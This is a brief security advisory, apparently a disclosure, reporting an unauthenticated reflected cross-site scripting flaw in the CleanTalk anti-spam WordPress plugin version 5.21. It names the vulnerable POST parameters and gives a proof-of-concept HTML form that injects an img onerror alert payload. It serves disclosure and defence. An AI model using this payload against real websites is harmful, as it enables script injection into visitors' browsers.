Hello,

Plugin: Anti-spam by CleanTalk 5.21 https://wordpress.org/plugins/cleantalk-spam-protect/

1. Reflected Cross-Site Scripting (XSS)

Unauthenticated users can inject html/js.

Method: POST

Url: http://localhost/

Vulnerable parameter: cleantalk_hidden_method, cleantalk_hidden_action

Example PHP callstack:

ct_init   [/cleantalk-spam-protect/cleantalk-public.php:47]

Verification:

--

<form method="POST" action="http://localhost/">

<input type="text" name="cleantalk_hidden_method" value="'><img src=x onerror=alert(1) />" />

<input type="text" name="cleantalk_hidden_action" value="'><img src=x onerror=alert(2) />" />

<input type="submit" name="submit">

</form>

--